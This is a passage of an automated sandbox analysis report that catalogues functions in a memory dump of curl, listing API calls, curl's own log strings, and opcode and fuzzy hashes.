                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLast$___from_strstr_to_strchr_errno$_strrchrfreegetsocknamestrncpystrtoul$__sys_errlist__sys_nerrbindcallocclosesockethtons
                                • String ID: %s %s$%s |%d|%s|%hu|$,$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                • API String ID: 2930231303-3103743990
                                • Opcode ID: f33c4006733b9997d64bfaf4235e17d081c01d06d69343361aec60d8a1c53569
                                • Instruction ID: 677730cf5dd4e7eb24874ee7cce9b5694d908109cb5f5d07088662b7a166dca3
                                • Opcode Fuzzy Hash: f33c4006733b9997d64bfaf4235e17d081c01d06d69343361aec60d8a1c53569
                                • Instruction Fuzzy Hash: 4F22FA70A006299FDF28AF24DC45BFE77B6FF84300F0841A9E449D7241DA758E948FA6
                                APIs
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(if!,?,00000003), ref: 0087DF9A
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(host!,?,00000005), ref: 0087DFC9
                                • inet_pton.WS2_32(00000017,?,?), ref: 0087E0C2
                                • inet_pton.WS2_32(00000002,?,?), ref: 0087E0EB
                                • htons.WS2_32(?), ref: 0087E100
                                • htons.WS2_32(?), ref: 0087E136
                                • htons.WS2_32(?), ref: 0087E18A
                                • bind.WS2_32(?,?,?), ref: 0087E1A5
                                • getsockname.WS2_32(?,?,?), ref: 0087E1E0
                                • WSAGetLastError.WS2_32 ref: 0087E1EA
                                • WSAGetLastError.WS2_32 ref: 0087E21C
                                Strings
                                • getsockname() failed with errno %d: %s, xrefs: 0087E209
                                • Couldn't bind to '%s', xrefs: 0087E119
                                • Local port: %hu, xrefs: 0087E246
                                • host!, xrefs: 0087DFC4
                                • Couldn't bind to interface '%s', xrefs: 0087DFAB
                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 0087E07D
                                • if!, xrefs: 0087DF95
                                • bind failed with errno %d: %s, xrefs: 0087E23B
                                • Bind to local port %hu failed, trying next, xrefs: 0087E177
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: htons$ErrorLastinet_ptonstrncmp$bindgetsockname
                                • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
                                • API String ID: 2929934046-1901189404
                                • Opcode ID: cd005f73786c2ae2619cdc95ca9d9f95411ec31c45b1be7b52a27b9c5eb303d3
                                • Instruction ID: fd345025d349fba2398caa1440abd6f4f6837c1a23bfe9ee97756892e3374ac3
                                • Opcode Fuzzy Hash: cd005f73786c2ae2619cdc95ca9d9f95411ec31c45b1be7b52a27b9c5eb303d3
                                • Instruction Fuzzy Hash: 69A10571A04618ABDB209B24DC4AFEA77B8FF59304F1481D9F84DD7245EB70DE818BA1
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C286
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C446
                                • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 0088C453
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C46D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C4EB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C508
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C527
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C590
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$atoi
                                • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
                                • API String ID: 2493182076-1748258277
                                • Opcode ID: 1ac15c57bda17fb2094e592d27ebc4f88d585806c60067e5a4ecbcad7a4a691c
                                • Instruction ID: a8e149cddbbffd4ae8ea3635e91c16490f9ef2bb6d9d7445ad9a3efce7fbcc38
                                • Opcode Fuzzy Hash: 1ac15c57bda17fb2094e592d27ebc4f88d585806c60067e5a4ecbcad7a4a691c
                                • Instruction Fuzzy Hash: 41D14931B44606AFEB18EB789881B7EB7A5FF55310F14822EE418D7385DF71AC5087A1
                                APIs
                                • socket.WS2_32(00000002,00000001,00000006), ref: 008A69C9
                                • htonl.WS2_32(7F000001), ref: 008A69F0
                                • setsockopt.WS2_32(00000000,0000FFFF,00000004,?,00000004), ref: 008A6A12
                                • bind.WS2_32(00000000,?,00000010), ref: 008A6A27
                                • getsockname.WS2_32(00000000,?,00000010), ref: 008A6A3E
                                • listen.WS2_32(00000000,00000001), ref: 008A6A59
                                • socket.WS2_32(00000002,00000001,00000000), ref: 008A6A6F
                                • connect.WS2_32(00000000,?,00000010), ref: 008A6A86
                                • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 008A6AA5
                                • accept.WS2_32(00000000,00000000,00000000), ref: 008A6AD6
                                • getsockname.WS2_32(?,?,00000010), ref: 008A6AF4
                                • getpeername.WS2_32(?,?,00000010), ref: 008A6B14
                                • closesocket.WS2_32(00000000), ref: 008A6B41
                                • closesocket.WS2_32(00000000), ref: 008A6B4C
                                • closesocket.WS2_32(?), ref: 008A6B54
                                • closesocket.WS2_32(?), ref: 008A6B5D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: closesocket$getsocknamesocket$acceptbindconnectgetpeernamehtonlioctlsocketlistensetsockopt
                                • String ID:
                                • API String ID: 2616969812-0
                                • Opcode ID: d6c2e8edf9becc9b68c46767346fe2fc5a5ad26bd9cd64336e5fc016b26716bb
                                • Instruction ID: b41b235e84affd2fa34d2c8454c8b636ec25de5d893c7233716e4e4a71b50dbe
                                • Opcode Fuzzy Hash: d6c2e8edf9becc9b68c46767346fe2fc5a5ad26bd9cd64336e5fc016b26716bb
                                • Instruction Fuzzy Hash: 045182B1900609EFEB10AFA4DC89BEEBBB9FF09320F544525F601F6190E77059568B74
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB20
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB42
                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB9C
                                • ___from_strstr_to_strchr.LIBCMT ref: 008ACD4F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AD01D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AD033
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$___from_strstr_to_strchrcallocmallocrealloc
                                • String ID: 0123456789-$<DIR>$APM0123456789:$rwx-tTsS$total
                                • API String ID: 1091099985-2767756851
                                • Opcode ID: 53264b3a520966f8a00b8ffa5952b1b9543f82bd3c34b6f8a9bbc8041651a407
                                • Instruction ID: 792cdd11c3a84beca33e4dc1e6a469507758ff3025cdb0f8ed879db6dfd62aae
                                • Opcode Fuzzy Hash: 53264b3a520966f8a00b8ffa5952b1b9543f82bd3c34b6f8a9bbc8041651a407
                                • Instruction Fuzzy Hash: 99228570A05B069FE728CF29C544B21BBF1FB9A314F148619D066CBEA1E771F891CB85
                                APIs
                                • CryptQueryObject.CRYPT32(00000002,?,00000002,0000000E,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008AECEF
                                • CertAddCertificateContextToStore.CRYPT32(?,?,00000004,00000000), ref: 008AED23
                                • CertFreeCertificateContext.CRYPT32(?), ref: 008AED31
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008AED54
                                Strings
                                • schannel: CA file '%s' is not correctly formatted, xrefs: 008AEDAC
                                • -----END CERTIFICATE-----, xrefs: 008AEC96
                                • schannel: failed to extract certificate from CA file '%s': %s, xrefs: 008AED96
                                • -----BEGIN CERTIFICATE-----, xrefs: 008AEC65
                                • schannel: did not add any certificates from CA file '%s', xrefs: 008AEDCF
                                • schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 008AED78
                                • schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 008AED6A
                                • schannel: added %d certificate(s) from CA file '%s', xrefs: 008AEDE5
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
                                • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
                                • API String ID: 854292303-665156428
                                • Opcode ID: c65a9f8d42582cf6f727132a2ead87fa1537855833667222b9c847a784852bfb
                                • Instruction ID: d13835fec776ed771593a563519ee46424c3c035c5ac0b7d38149b22382e324e
                                • Opcode Fuzzy Hash: c65a9f8d42582cf6f727132a2ead87fa1537855833667222b9c847a784852bfb
                                • Instruction Fuzzy Hash: 8A519671E0021C9BEB299B29CC46FEEB7B5FB49710F0445D9F509E6241DA708E818F91
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,754C1980,00000001), ref: 0087461F
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087462A
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 0087463A
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00874645
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00874650
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087465D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$strtol
                                • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$0Lu@Ru@/Mu$GMT
                                • API String ID: 3596500743-3127766582
                                • Opcode ID: 610e06eb93866ebe7ce0a15dd94ed748c0a4c9a2de2dd3ed4b50ef9e441758f5
                                • Instruction ID: e96644db7bcf6f44a598cd444153b10229fdbf65d7939d9daf9ae70e8d5ff31e
                                • Opcode Fuzzy Hash: 610e06eb93866ebe7ce0a15dd94ed748c0a4c9a2de2dd3ed4b50ef9e441758f5
                                • Instruction Fuzzy Hash: DAD16071E012189FCB14CFB8D8806ADB7B6FB4A364F25932AE529E7298D730DD418B51
                                APIs
                                  • Part of subcall function 00870B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00870B6D
                                  • Part of subcall function 00870B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00870B74
                                • CertGetNameStringA.CRYPT32(?,00000006,00010002,00000000,?,000001B8), ref: 008AF073
                                Strings
                                • 2.5.29.17, xrefs: 008AF0C9, 008AF0FD
                                • schannel: Null certificate context., xrefs: 008AF0A3
                                • schannel: Null certificate info., xrefs: 008AF0BC
                                • schannel: CertFindExtension() returned no extension., xrefs: 008AF0D8
                                • schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 008AF111
                                • schannel: Not enough memory to list all host names., xrefs: 008AF1C3
                                • schannel: Empty DNS name., xrefs: 008AF13E
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: AddressCertHandleModuleNameProcString
                                • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
                                • API String ID: 4138448956-2160583098
                                • Opcode ID: 189b19d985f96cb254d0f5d2dd359c6f90b078e47a9f64bafdd75263b774fe8c
                                • Instruction ID: 9c42a0a52ecc418c37f925815106f84f35e26f771c58fe4311d569dedbbf9b07
                                • Opcode Fuzzy Hash: 189b19d985f96cb254d0f5d2dd359c6f90b078e47a9f64bafdd75263b774fe8c
                                • Instruction Fuzzy Hash: 2951D331A00205EEEB15DFA4C881FAEBBF5FF49704F10C069E619EB642E7758942CB90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __aulldiv
                                • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                • API String ID: 3732870572-2102732564
                                • Opcode ID: 83630a785ce3910b6f5f40de95ca59cc5d0763e3621828b89fb3c0859c245b86
                                • Instruction ID: 8e62aa4d63362d658b8f46c25b99be14c0d6493908b88cc226943826d7a8c4d4
                                • Opcode Fuzzy Hash: 83630a785ce3910b6f5f40de95ca59cc5d0763e3621828b89fb3c0859c245b86
                                • Instruction Fuzzy Hash: 3C31C47BE4152975E938140DDC5AE9B641FF783B6AF17012AFC29F338294B49C4090F2
                                Strings
                                • Server doesn't support multiplex (yet), xrefs: 008826D2
                                • Multiplexed connection found, xrefs: 00882DD7
                                • Found bundle for host: %p [%s], xrefs: 0088267F
                                • Connection #%ld isn't open enough, can't reuse, xrefs: 008827D4
                                • Server doesn't support multiplex yet, wait, xrefs: 008826A6
                                • Can not multiplex, even if we wanted to, xrefs: 00882712
                                • serially, xrefs: 00882670
                                • Connection #%ld is still name resolving, can't reuse, xrefs: 008827B4
                                • can multiplex, xrefs: 00882675, 0088267D
                                • Could multiplex, but not asked to, xrefs: 008826FA
                                • Found pending candidate for reuse and CURLOPT_PIPEWAIT is set, xrefs: 00882E09
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: Can not multiplex, even if we wanted to$Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Could multiplex, but not asked to$Found bundle for host: %p [%s]$Found pending candidate for reuse and CURLOPT_PIPEWAIT is set$Multiplexed connection found$Server doesn't support multiplex (yet)$Server doesn't support multiplex yet, wait$can multiplex$serially
                                • API String ID: 0-1297456373
                                • Opcode ID: 350437a3d564a8d418c6f72f489dbdfe69e40d56afcb1a4240512ff36f20fbf8
                                • Instruction ID: 007f87fabcc6dfdbd517cfef8c507759a674c8dac69050587d400f9d441f3c09
                                • Opcode Fuzzy Hash: 350437a3d564a8d418c6f72f489dbdfe69e40d56afcb1a4240512ff36f20fbf8
                                • Instruction Fuzzy Hash: 3732E334A047858BDF66FF358590BFA7BA2FF62304F1884A9C889DB242D731AC85C751
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008984DB
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089854E
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00898580
                                • bind.WS2_32(?,00000030,?), ref: 008985FC
                                • WSAGetLastError.WS2_32 ref: 00898607
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: calloc$ErrorLastbind
                                • String ID: bind() failed; %s
                                • API String ID: 2604820300-1141498939
                                • Opcode ID: 84f26ba913894019fd53b3800791d202245f14466c6add4ac160616eff3caff0
                                • Instruction ID: 6b00b815d6d368a2d51df71f8f861d5f8b420f8044884309a653e3b7767c04ea
                                • Opcode Fuzzy Hash: 84f26ba913894019fd53b3800791d202245f14466c6add4ac160616eff3caff0
                                • Instruction Fuzzy Hash: EF517D7460460ADFEF18DF28C849BD9B7A0FF55710F1841A9E909DB392DBB0A984CF91
                                APIs
                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040), ref: 008A65D2
                                • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 008A65EC
                                • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 008A65FD
                                • CryptGetHashParam.ADVAPI32(?,00000004,?,00000004,00000000,?,?,00000000), ref: 008A6616
                                • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?,00000000), ref: 008A6633
                                • CryptDestroyHash.ADVAPI32(00000000), ref: 008A6642
                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 008A6653
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                • String ID:
                                • API String ID: 3606780921-0
                                • Opcode ID: 28b9a3cbbb360ba6b0e8bad76bed270c63361f19a132fbe1f319cc1954c8a13e
                                • Instruction ID: 64298e8fab39fe0a9781677de53748d67a3c0afbe26e817f2f8a80aa7a9b1d4a
                                • Opcode Fuzzy Hash: 28b9a3cbbb360ba6b0e8bad76bed270c63361f19a132fbe1f319cc1954c8a13e
                                • Instruction Fuzzy Hash: 6F21E671A40608FBEB21AF94DC4AF9EBBB9FB04700F184165B604F60A0E7709A55DBA5
                                APIs
                                • CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000,00000000,?,00000000,?,?,008AF8EB,?,?,?,?,008A9C33,00000000), ref: 008AF879
                                • CryptGetHashParam.ADVAPI32(?,00000002,?,00000020,00000000,?,?,008AF8EB,?,?,?,?,008A9C33,00000000,?), ref: 008AF892
                                • CryptDestroyHash.ADVAPI32(?,?,?,008AF8EB,?,?,?,?,008A9C33,00000000,?), ref: 008AF8A0
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,008AF8EB,?,?,?,?,008A9C33,00000000,?), ref: 008AF8AD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                • String ID:
                                • API String ID: 2110207923-3916222277
                                • Opcode ID: 2e09ff7fda8ae5dce00229cfb46249445d2cd914571b01932e2bd6c2b1090418
                                • Instruction ID: 5fc562b82de8088ae2c5eb7dc22cdfdb38b9c4c0398534013cba379099c43a5d
                                • Opcode Fuzzy Hash: 2e09ff7fda8ae5dce00229cfb46249445d2cd914571b01932e2bd6c2b1090418
                                • Instruction Fuzzy Hash: ECF0F935400A08FFEB31AF85DD09E9BBBB9FB85B11B508179F945A2460D3715E41EB90
                                APIs
                                • CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 00863148
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00863155
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 0086316F
                                • Module32First.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 0086318D
                                • Module32Next.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 008631B2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Module32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3822340588-0
                                • Opcode ID: 1c614a55fe0c5f4a42b6cfb1d8246119a347aecda2a767a70fa4c55d2456e703
                                • Instruction ID: 98aff891fa6e555f7f413dc5e9f7c6bec55f4ad2ec7de3e67ed3baa60c8caaec
                                • Opcode Fuzzy Hash: 1c614a55fe0c5f4a42b6cfb1d8246119a347aecda2a767a70fa4c55d2456e703
                                • Instruction Fuzzy Hash: 15110E31601218ABD721ABB9AC4DBAF77A9FB86320F050364F915D31D0EF70CF458A62
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 008B1567
                                • IsDebuggerPresent.KERNEL32 ref: 008B1633
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008B1653
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 008B165D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                • String ID:
                                • API String ID: 254469556-0
                                • Opcode ID: 2681b248c99c7cd38b12233a58e6cfabab4f0db71b48b566f48058aae86b1981
                                • Instruction ID: 5ed5ae287b18235daaa3952bd47d466e80d0f8393ff05420c44e56830487e29c
                                • Opcode Fuzzy Hash: 2681b248c99c7cd38b12233a58e6cfabab4f0db71b48b566f48058aae86b1981
                                • Instruction Fuzzy Hash: DF311AB5D056189BDF20EF64D9897CCBBB8FF04300F10419AE40DAB250EB715A85CF45
